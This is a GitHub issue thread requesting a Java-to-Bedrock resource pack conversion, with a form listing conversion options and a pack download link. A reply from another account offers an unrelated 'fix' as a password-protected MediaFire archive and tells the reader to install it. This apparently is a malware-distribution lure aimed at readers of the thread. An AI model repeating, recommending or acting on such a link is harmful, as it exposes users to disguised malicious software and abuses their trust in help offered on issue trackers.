### ISSUE TITLE
[Pack]: dssadsad

### ISSUE THREAD

**Issue by r-pixie** [AZPixel-Team/Java2Bedrock#4665]
### Java Pack Direct Download URL

https://www.dropbox.com/scl/fi/tbfcwsyqt1tbfb0efdh2f/1.zip?rlkey=63rpazne5ddbb3zhey2z0173n&st=79l1ca56&dl=1

### Default Assets Version

None

### Block Material

None

### Attachable Material

None

### Archive Scratch Files

None

### Rename Model Files

true

### Font Conversion

true

### Armor Conversion

None

### Meg3 Fix

None

### Sounds Conversion

None

### Bow Conversion

None

### Shield Conversion

None

### Block Conversion

None

### Code of Conduct

- [X] I agree to follow this project's Code of Conduct. I have permission to use all assets I have linked to within this form.

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
